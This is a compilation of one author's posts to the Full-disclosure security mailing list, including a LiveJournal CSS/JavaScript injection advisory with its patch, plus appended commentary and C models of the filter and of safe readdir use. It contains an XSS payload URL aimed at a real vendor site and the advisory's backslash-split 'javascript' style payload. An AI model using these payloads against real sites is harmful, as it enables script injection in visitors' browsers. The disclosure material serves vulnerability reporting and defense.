Andrew Farmer [EMAIL PROTECTED]
CISSP CSFA SSP-CNSA SSP-MPA GIPS GWAS CAP
Re: [Full-disclosure] Promiscious Device Detection
On 09 Mar 06, at 04:04, Q Beukes wrote:

> I am looking for a Linux utility that checks if a specified machine's network device is in promiscuous mode or not. C source is preferred so I could maybe modify it (if needed) so it actively searches for such devices and syslogs such finds.

You can't search for promisc devices, as they don't advertise themselves in any way. Chkrootkit[1], though, will check the local machine for a promisc interface, as well as other signs of possible badness.

[1]: http://www.chkrootkit.org/
Re: [Full-disclosure] Fun with Foundstone
And while we're at it...

https://download.foundstone.com/?o=;scriptalert(xss)/script
Re: [Full-disclosure] cPanel 10 File Editing Vulnerability
On 04 Feb 06, at 09:16, Shell wrote:

> In cPanel 10, the script erredit.html, which is supposed to edit a specific set of files, can edit any file accessible by the cPanel.
>
> Example:
> http://www.example.com:2082/frontend/x/err/erredit.html?dir=public_html/file=index.php
>
> Tested on a real cPanel system running cPanel 10.8.1-RELEASE.

This won't edit files outside the user's home directory, even with traversal paths, and deletes files before writing them - this doesn't appear exploitable; indeed, it doesn't seem to be much except a weird way of editing your own files.
[Full-disclosure] LiveJournal CSS/JS injection vulnerability
SUMMARY
-------

The popular LiveJournal[1] social networking software contained an error which allowed for the inclusion of Javascript in user-supplied content.

[1] http://www.livejournal.org/, http://www.livejournal.com/

BACKGROUND
----------

LiveJournal is an online journal service with an emphasis on user interaction.[2] It has historically had a relatively restrictive attitude toward user-supplied web content, opting to not allow users to include active content such as embedded plugins and scripts. This attitude has generally prevented the creation and spread of malicious content, such as the two worms which appeared on MySpace in recent months. However, this position also requires that content be carefully parsed - and a recent discovery showed that their code has its issues.

[2] http://www.livejournal.com/support/faqbrowse.bml?faqid=56

DESCRIPTION
-----------

LiveJournal parses all user-supplied HTML through a script called cleanhtml.pl (located at livejournal/cgi-bin/cleanhtml.pl). All HTML attributes containing the literal text 'javascript' are stripped by default. However, if the cleancss option is enabled - which it is in most installations, including the one at livejournal.com - style attributes will have slashes stripped after the check for the text 'javascript' is made, causing a style property containing the text 'java\script' to be modified to 'javascript' and passed through. As many web browsers allow javascript: to be used as a pseudo-URI, this allows for the creation of content that will execute arbitrary script code on a user's browser when viewed.

For example, the HTML content

  <span style="background:url('javas\cript:(function x(){alert(&quot;boo&quot;)})();');">test</span>

will be accepted by an unpatched LiveJournal installation; the slash will be removed, causing a dialog to be displayed when the content is viewed.

FIXES
-----

As of 7 Dec 2005, LiveJournal CVS contains a fix to this issue: cleanhtml.pl now searches for the text 'javascript' in CSS *after* stripping slashes:

--- cgi-bin/cleanhtml.pl22 Oct 2005 03:17:05 - 1.129 +++ cgi-bin/cleanhtml.pl7 Dec 2005 08:50:41 - 1.130 @@ -319,7 +319,7 @@ $hash-{$attr} =~ s/\\//g; # and catch the obvious ones ([ is for things like document[coo+kie] -foreach my $css (/*, [, qw(absolute fixed expression eval behavior cookie document window)) { +foreach my $css (/*, [, qw(absolute fixed expression eval behavior cookie document window javascript)) { if ($hash-{$attr} =~ /\Q$css\E/i) { delete $hash-{$attr}; next ATTR;

All sites using the LiveJournal code are urged to upgrade, or apply this patch, as soon as possible.

ACKNOWLEDGEMENTS
----------------

The author would like to acknowledge Hoshikuzu Stardust (st4rdust at gmail.com) for reporting a related issue involving the escaping of control characters in CSS; this vulnerability was discovered during experimentation and testing regarding that issue.

HISTORY
-------

Discovery: circa 5 Dec 2005
Vendor notified: 5 Dec 2005
Patch implemented: 7 Dec 2005
Public disclosure: 19 Dec 2005

AUTHOR
------

Andrew Farmer is a student at Harvey Mudd College.
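Review bot: the 'javascript' entry added to the qw() list in the foreach hunk catches the reported bypass only because the `s/\\//g` line just above it has already removed the backslashes; the check remains a case-insensitive substring denylist run after that single decoding step, so any other escaping a browser undoes but this code does not (the acknowledgements already name a related control-character escaping issue in CSS) is beyond its reach. Safer would be to reject a style value outright when it contains a backslash rather than stripping it, and to validate url() values against an allowlist of schemes instead of searching for bad words. The branch that deletes the attribute and does `next ATTR` also drops it silently; logging the rejected value there would make attempts against the filter visible to the site's operators.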
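As an added example, not LiveJournal's cleanhtml.pl but a C model of the check the DESCRIPTION and the hunk describe: the same denylist and backslash stripping, once in the pre-fix order and once in the 1.130 order. The input is the advisory's own example style value, constructed here as a string; the function names (clean_style_vulnerable, clean_style_fixed, outcome) are mine.

```c
#include <ctype.h>
#include <string.h>
/* Constructed input: the advisory's style value, with a backslash splitting 'javascript'. */
#define PAYLOAD "background:url('javas\\cript:(function x(){alert(\"boo\")})();')"
/* The cleancss denylist as it stood in the quoted hunk before the fix. */
static const char *DENYLIST[] = { "/*", "[", "absolute", "fixed", "expression",
                                  "eval", "behavior", "cookie", "document", "window" };
/* Case-insensitive substring test, standing in for Perl's /\Q$css\E/i. */
static int contains_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i])) i++;
        if (i == n) return 1;
    }
    return 0;
}
/* The cleancss step: copy value to out with every backslash removed. */
static void strip_backslashes(const char *in, char *out, size_t cap) {
    size_t j = 0;
    for (; *in && j + 1 < cap; in++) if (*in != '\\') out[j++] = *in;
    out[j] = '\0';
}
static int denylisted(const char *v, int with_javascript) {
    for (size_t i = 0; i < sizeof DENYLIST / sizeof *DENYLIST; i++)
        if (contains_ci(v, DENYLIST[i])) return 1;
    return with_javascript && contains_ci(v, "javascript");
}
/* Pre-fix order: 'javascript' is looked for in the raw attribute, and only then are
 * backslashes stripped, so 'javas\cript' turns into 'javascript' after the check. */
int clean_style_vulnerable(const char *value, char *out, size_t cap) {
    if (contains_ci(value, "javascript")) return 0;
    strip_backslashes(value, out, cap);
    return !denylisted(out, 0);
}
/* Post-fix order (cleanhtml.pl 1.130): decode first, then check the full list. */
int clean_style_fixed(const char *value, char *out, size_t cap) {
    strip_backslashes(value, out, cap);
    return !denylisted(out, 1);
}
/* 0 = attribute dropped, 1 = accepted, 2 = accepted and still carrying 'javascript:'. */
int outcome(int use_fixed, const char *value) {
    char out[256];
    int ok = use_fixed ? clean_style_fixed(value, out, sizeof out)
                       : clean_style_vulnerable(value, out, sizeof out);
    return ok ? (contains_ci(out, "javascript:") ? 2 : 1) : 0;
}
```

The general lesson is the ordering: every check has to run on the value exactly as the browser will see it, after all decoding, not before.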
Re: [Full-disclosure] Re: readdir_r considered harmful
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:

> > Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work.
>
> I don't see how that is relevant; the typical use of readdir() is as follows:
>
>   DIR *dirp = opendir(name);
>   while ((dent = readdir(dirp)) != NULL) {
>     ...
>   }
>   closedir(dirp);
>
> Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't imagine the use.

In practice, you're correct. In theory, however, consider the following code path.

  THREAD 1                      THREAD 2
  ----------------------------  ----------------------------
  DIR *d1 = opendir(dir1);
                                DIR *d2 = opendir(dir2);
  dent1 = readdir(d1);
                                dent2 = readdir(d2);
  use(dent1);

In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe.

You are correct, though, that the glibc implementation of readdir is thread-safe, so readdir_r is unnecessary in all common situations.
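As an added example (not code from this thread), the defensive pattern the argument points at, in C: copy each entry out of readdir()'s buffer before the next readdir() call, so it no longer matters whether that buffer is per-stream or static; this is also the approach glibc recommends now that readdir_r is deprecated. The two scratch directories under /tmp stand in for the two threads' streams and are constructed for the demonstration.

```c
#define _DEFAULT_SOURCE 1
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Caller-owned copy of a directory entry's name (NAME_MAX + 1 on Linux). */
typedef struct { char name[256]; } entry_t;
/* Read the entries of path (skipping . and ..) into out[], copying each name out
 * of readdir()'s buffer before the next readdir() call. Returns count or -1. */
int read_entries_copy(const char *path, entry_t *out, int max) {
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    struct dirent *de;
    while (n < max && (de = readdir(d)) != NULL) {
        if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, "..")) continue;
        snprintf(out[n++].name, sizeof out->name, "%s", de->d_name);
    }   /* de is never dereferenced after the copy */
    closedir(d);
    return n;
}
/* Scenario helpers: create or remove dir/name. */
static void touch(const char *dir, const char *name) {
    char p[512]; snprintf(p, sizeof p, "%s/%s", dir, name);
    int fd = open(p, O_WRONLY | O_CREAT, 0600); if (fd >= 0) close(fd);
}
static void rmfile(const char *dir, const char *name) {
    char p[512]; snprintf(p, sizeof p, "%s/%s", dir, name); unlink(p);
}
/* Constructed scenario standing in for the two threads' streams: read dir1 into
 * copies, read dir2 on a second DIR, then check the dir1 copies survived. */
int demo(void) {
    char d1[] = "/tmp/rd1XXXXXX", d2[] = "/tmp/rd2XXXXXX";
    if (!mkdtemp(d1)) return 0;
    if (!mkdtemp(d2)) { rmdir(d1); return 0; }
    const char *want[] = { "a", "b", "c" };
    for (int i = 0; i < 3; i++) touch(d1, want[i]);
    touch(d2, "x");
    entry_t e1[8], e2[8];
    int n1 = read_entries_copy(d1, e1, 8);
    int n2 = read_entries_copy(d2, e2, 8);   /* a second stream, a second buffer */
    int found = 0;
    for (int i = 0; i < 3; i++)
        for (int j = 0; j < n1; j++) found += !strcmp(e1[j].name, want[i]);
    for (int i = 0; i < 3; i++) rmfile(d1, want[i]);
    rmfile(d2, "x"); rmdir(d1); rmdir(d2);
    return n1 == 3 && n2 == 1 && found == 3;   /* 1 when all copies are intact */
}
```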
Re: [Full-disclosure] Comparing Algorithms On The List Of Hard-to-brute-force?
On 01 Nov 05, at 10:11, Brandon Enright wrote:

> Brute forcing an algorithm suggests that you are not attacking a weakness or known flaw in the algorithm but rather just running through the keyspace trying to recover the plaintext. In that case, whichever allows you to use the most bits is what you want.

Note that the encryption speed of an algorithm is *not* a significant factor in the time taken to brute-force it, except for extremely small keyspaces! Remember that the time taken to brute-force an N-bit algorithm that takes K seconds per encryption is, on average,

  K * 2^N

which increases much more rapidly with N than it does with K. Adding even one more bit will double the average time taken to brute-force an algorithm, while using a slower algorithm will only increase the difficulty marginally.

Also note that anything beyond 256 bits is silly. Brute-forcing a 256-bit algorithm can be shown to be PHYSICALLY impossible, so there's no reason to go anywhere beyond that.
Re: [Full-disclosure] Forensic help?
On 11 Sep 05, at 15:49, James Wicks wrote:

> Here is a way to do it on the cheap:
>
> 1. Ghost the hard drive with Symantec Ghost - http://www.symantec.com/sabu/ghost/ghost_personal/

man dd
Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft
On 12 Apr 2005, at 00:21, Ag. System Administrator wrote:

> ms_sig.jpg

I suppose you believe the signature on this message too, then.